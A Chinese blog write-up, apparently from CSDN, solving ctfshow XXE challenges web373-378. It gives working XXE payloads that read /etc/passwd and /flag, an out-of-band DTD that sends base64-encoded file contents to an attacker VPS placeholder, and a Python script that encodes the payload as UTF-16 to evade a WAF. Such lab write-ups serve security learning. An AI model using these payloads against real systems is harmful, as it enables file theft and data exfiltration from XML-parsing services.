[WP/ctfshow/XXE]ctfshow_XXE_web373-378

最新推荐文章于 2024-08-01 20:34:53 发布
最新推荐文章于 2024-08-01 20:34:53 发布
阅读量966 收藏
点赞数
分类专栏: # 凌晨四点起床刷题 # Web安全 文章标签: XXE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/120753521
版权

外部实体注入

WEB373

// 允许加载外部实体
libxml_disable_entity_loader(false);
// xml文件来源于数据流
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
  	// 加载xml实体,参数为替代实体、加载外部子集
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
  	// 把 DOM 节点转换为 SimpleXMLElement 对象
    $creds = simplexml_import_dom($dom);
  	// 节点嵌套,确定为了ctfshow元素,避免与变量名混淆,这个子元素名必须为ctfshow
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}

解题

<?xml version = "1.0" encoding = "utf-8"?>
<!DOCTYPE Docc [
    <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<www>
    <ctfshow>
    	&file;
    </ctfshow>
</www>

WEB374-376

过滤<?xml ?>,此项解析时可不包括。

XXE.dtd

第一行伪协议读文件,第二行实体参数其值为实体b。

紧接着进行实体替换file->a->get->b

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % a "<!ENTITY &#x25; b SYSTEM 'http://[VPS-IP]/XXE.php?d=%file;'>">
%a;%b;

XML文档

XML文档的实体参数触发dtd中的系列读文件。

<!DOCTYPE note[
<!ENTITY  % c SYSTEM "http://[VPS-IP]/XXE.dtd">
%c;
]>

接受脚本

可以接受参数d和读写文件即可。

WEB377

WAF处理的字符集往往是有限的,我们可以使用一些少用的字符集来对发送的Payload进行编码。

正则表达式识别的字符集往往单一。

import requests

url = 'http://123456-1231231.challenge.ctf.show:8080/'
payload = """<!DOCTYPE note[
<!ENTITY  % call SYSTEM "http://[VPS-IP]/XXE.dtd">
%call;
]>
"""
payload = payload.encode('utf-16')
print(requests.post(url, data=payload))

WEB378

[NCTF2019]Fake XML cookbook

<!DOCTYPE note[
<!ENTITY  file SYSTEM "file:///flag">
]>
<user><username>&file;</username><password>123456</password></user>
車鈊
关注
专栏目录
[CSAWQual 2019]Web_Unagi - 文件上传+XXE注入(XML编码绕过)
oZuoShen123的博客
10-10 1362
alice passwd1 Alice alice@fakesite.com CSAW2019 bob passwd2 Bob bob@fakesite.c
CTFshow XXE(web373-378)
Kradress的博客
03-18 552
post提交,这里外部引入vps的dtd文件。抓包发现username处存在回显。base64解码拿到flag。直接套八股文,拿到flag。这里需要一个根节点来包含。这里用python脚本。这里可以外部引入一个。
ctfshow-XXE(web373-web378)_ctfshow373
2401_84971538的博客
05-12 621
能编码简单理解就是(我的理解)input获取到数据后 先绕过正则 然后在操作xml的时候这个对象就能识别出是xml 因为xml支持utf-16 这时哪怕在xml声明编码方式为utf-8这也无所谓 这声明的只是xml内容为utf-8 但是整体过来是utf-16 这个对象是能识别出来的 然后看到这个声明为utf-8后再将内容设为utf-8的编码方式。使用一个不同的方式吧(原理都是一个意思) 为什么要绕一圈呢,就是因为在请求的时候 默认不允许将本地文件发送到dtd文件 间接的影响了我们的请求 所以要套一层。
CTFSHOW-web373-378
最新发布
qq_52579508的博客
08-01 417
在vps上创建一个test.dtd文件,用于反弹shell,内容如下。要绕过 http 就要进行编码绕过 编码为 utf-16。和上题的代码差别不大 ,但是没有输出了,无回显数据。要使用远程服务器 加载 dtd文件。VPS收到flag的base64。以及可以使用这个payload。上面的payload 不行了。这里他不能带有 http了。查看flag的payload。输入的内容不能带那个。
ctfshow web入门 XXE web373~web378
qq_62989306的博客
09-13 1173
burpsuite发包,不能用hackbar[POST]Payload: &xxe;
ctfshow XXE web373-web378 wp
mumuzi的博客
02-11 1775
文章目录web373web374-376web377web378 web373 XXE(XML External Entity Injection) 全称为 XML 外部实体注入。注入的是XML外部实体 参考文章:一篇文章带你深入理解漏洞之 XXE 漏洞 libxml_disable_entity_loader(false);:禁止加载外部实体。一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 ( ; ) flag在flag里 <?xml version="1.0"
Ctfshow web入门 XXE 模板注入篇 web373-web378 详细题解 全
Jay17的博客
08-07 2311
Ctfshow web入门 XXE 模板注入篇 web373-web378 详细题解 全
-------已搬运------CTFSHOW---WEB AK赛 -- 包含日志 ---sql注入 ---- xxe ----
Zero_Adam的博客
04-29 774
目录:web0_签到_观己一、自己做:二、学到的&&不足:web1_观宇一、自己做:二、学到的:三、学习WP:web2_观星00000+一、自己做:三、看WP: web0_签到_观己 一、自己做: 吐槽一句,ctfshow 的题就是 考知识点!! ,一点拖泥带水的。赞一个!!! <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ d
XML schema 编辑工具 xxe-perso-4_9_1
11-19
"xxe-perso-4_9_1"看起来是一款专门针对XML Schema编辑的工具,版本号为4.9.1。这类工具通常提供以下功能: 1. **XML Schema设计**:用户可以通过图形界面设计复杂的XML Schema,定义元素、属性、数据类型、约束等...
DTD(文档类型定义)介绍
qq_40321119的博客
10-18 2478
DTD简介 DTD中文意思是:文档类型定义,主要用来定义合法的文档结构(包括XML和HTML);可以声明在文档中,也可以作为外部的引用。 内部DTD声明 <?xml version="1.0"?> <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> ...
wordpress-api:wordpress的api接口
04-29
wordpress-api wordpress的api接口 技术支持 接口文档 注意事项 因为本站用了WP-PostViews插件(用来统计文章浏览量的,很好用),所以可以通过wp_postmeta表中的字段来获得文章浏览量,如果没有安装这个插件,那么需要删除SQL语句中与views相关的语句,否则会报错。
ctfshow xxe web373-378
2301_80553405的博客
03-30 575
我们需要获得当前目录下的flag数据,然后在本地服务器创建的dtd文件(创建与我们的服务器的联系),最后一个%send将实体解析,于是在题目的服务器下,将/flag文件里的数据通过实体%file通过get传参传入了get.php文件中并执行,于是触发命令,在本地服务器建立flag.txt并将flag写入了其中。ISO-8859-1(Latin-1):虽然不常见,但XML解析器通常也能够解析使用ISO-8859-1编码的XML文档。UTF-8:这是最常见的编码形式,也是许多XML文档默认使用的编码。
ctfshow xxe
2301_80217595的博客
03-30 806
一个xml文档不仅可以用UTF-8编码,也可以用UTF-16(两个变体 - BE和LE)、UTF-32(四个变体 - BE、LE、2143、3412)和EBCDIC编码。libxml_disable_entity_loader #禁用/启用加载外部实体的功能 参数为true时为禁用,参数为false为启用。做374-376得先注册一个服务器,这里可以免费领一个阿里云服务器,在其安全组开放8888和80端口。之后下载xshell和宝塔,宝塔下载linux面板,其ip是你服务器的ip和密码。
CTFSHOW—XXE
灰太的表格的博客
01-31 434
(睡了一下午打算,通宵学习hhhh) web373 wa1ki0g标签可以随便改,ctfshow这个不可以。 !DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <wa1ki0g> <ctfshow>&xxe;</ctfshow> </wa1ki0g>
Nctf_web_wp
weixin_30363509的博客
05-17 163
1.签到题 右键源代码即可2.md5 collision 这个考点是php"=="的弱相等,为何会出现弱加密呢,是因为在比较==两边的时候,会将字符串类型转化为相同,在进行比较。例如“admin”== 0,这个比较是返回True的,因为会先强制的将admin转化为数值,转化出来的结果就是0==0,所以返回为True。那为什么admin强制类型转化之后取值为0呢?这是因为php在强制转...
NCTF2018web-wp
wuerror的博客
01-24 562
签到题: 访问indexphp,页面301跳转,在cookie里找到flag 待续
ctfshow-XXE(web373-web378)
m0_72125469的博客
03-11 1179
ctfshow web373 web374 web375 web376 web377 web378
ctfshow web 入门xxe
08-23
- *1* [ctfshow web入门 XXE web373~web378](https://blog.csdn.net/qq_62989306/article/details/126839849)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值